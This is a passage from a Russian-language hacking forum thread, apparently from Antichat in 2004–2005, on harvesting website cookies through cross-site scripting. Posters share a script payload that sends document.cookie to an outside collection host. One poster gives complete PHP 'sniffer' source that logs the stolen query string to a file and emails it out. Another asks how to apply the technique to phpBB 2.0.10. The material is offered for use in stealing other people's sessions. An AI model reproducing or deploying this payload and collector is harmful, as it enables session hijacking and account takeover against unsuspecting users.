HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Вопрос про отправку кук на сниффер http://antichat.ru/cgi-bin/s.jpg?
   
Ответ
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 13.10.2004, 19:31
salop
Новичок
Регистрация: 10.10.2004
Сообщений: 8
С нами: 11358788

Репутация: 0
По умолчанию
<script&gt;img = new Image(); img.src = &quot;http://antichat.ru/cgi-bin/s.jpg?&quot;+d...lt;/script&gt;
а на пшп какой функцией получить куки ?

например есть
&lt;?
$adr = &quot;&quot;.getenv(&quot;HTTP_REFERER&quot.&quo t;&quot;;
print $adr
?&gt;
что нужно добавить ?
 
Ответить с цитированием

  #12  
Старый 13.10.2004, 19:43
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
С нами: 11540434

Репутация: 82
По умолчанию
$_COOKIE[&quot;переменная&quot;];

или массив
implode('', $_COOKIE);
 
Ответить с цитированием

  #13  
Старый 13.10.2004, 20:03
salop
Новичок
Регистрация: 10.10.2004
Сообщений: 8
С нами: 11358788

Репутация: 0
По умолчанию
спасибо тебе
 
Ответить с цитированием

  #14  
Старый 13.10.2004, 20:09
salop
Новичок
Регистрация: 10.10.2004
Сообщений: 8
С нами: 11358788

Репутация: 0
По умолчанию
чтото неполучаеться у меня...можеш написать код пожалуйста ?
 
Ответить с цитированием

  #15  
Старый 13.10.2004, 23:47
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
С нами: 11540434

Репутация: 82
По умолчанию
если ты имеешь ввиду код снифера, то вот

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><?

$filename = 'sniff.txt';
$somecontent = date("l dS of F Y h:i:s A") .
"\r\nSERVER_ADDR = " . $_SERVER["SERVER_ADDR"] .
(isset($_SERVER["HTTP_REFERER"]) ? "\r\nHTTP_REFERER = " . $_SERVER["HTTP_REFERER"] : '') .
"\r\nQUERY_STRING = " . $_SERVER["QUERY_STRING"] . "\r\n\r\n";

mail('mail@addr.com', 'sniff', $somecontent);

// Let's make sure the file exists and is writable first.
if (is_writable($filename)) {

// In our example we're opening $filename in append mode.
// The file pointer is at the bottom of the file hence
// that's where $somecontent will go when we fwrite() it.
if (!$handle = fopen($filename, 'a')) {
echo "Cannot open file ($filename)";
exit;
}

// Write $somecontent to our opened file.
if (fwrite($handle, $somecontent) === FALSE) {
echo "Cannot write to file ($filename)";
exit;
}

//echo "Success, wrote ($somecontent) to file ($filename)";

fclose($handle);

} else {
echo "The file $filename is not writable";
}

?>[/QUOTE]<span id='postcolor'>
 
Ответить с цитированием

  #16  
Старый 13.10.2004, 23:57
salop
Новичок
Регистрация: 10.10.2004
Сообщений: 8
С нами: 11358788

Репутация: 0
По умолчанию
спасибо...пригодиться...но этот снифер не тянет куки
 
Ответить с цитированием

  #17  
Старый 14.10.2004, 09:03
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
С нами: 11540434

Репутация: 82
По умолчанию
этот снифер тянет все что ему дать

а куки можно утянуть только одним способом
...='http://.../1.php?'+document.cookie т.е. через QUERY_STRING
 
Ответить с цитированием

  #18  
Старый 14.10.2004, 13:57
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию
2salop
Тянуть куки пхп-шным $_COOKIE[&quot;переменная&quot;]; бесполезно, поскольку так ты получишь совсем не те куки, на которые рассчитываешь))
 
Ответить с цитированием

  #19  
Старый 13.11.2004, 02:36
X-Seven
Новичок
Регистрация: 07.11.2004
Сообщений: 4
С нами: 11319269

Репутация: 0
По умолчанию
А как этим сниффером можно потянуть куки phpbb2.0.10?
Если вставлять через [img] как картинку,то в логах
фиксируется только ip и урл.Есть какие-нибудь способы?
 
Ответить с цитированием

  #20  
Старый 22.07.2005, 14:54
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами: 11156006

Репутация: 749


По умолчанию
Цитата:
Сообщение от жека  
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июля 23 2004,19:28)</td></tr><tr><td id="QUOTE">В примерах же описано
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
<span id='postcolor'>[/QUOTE]<span id='postcolor'>
Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...[/QUOTE]



Ой не могу =))) сердце аж прихватило =)))) я плакаль
 
Ответить с цитированием
Ответ
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...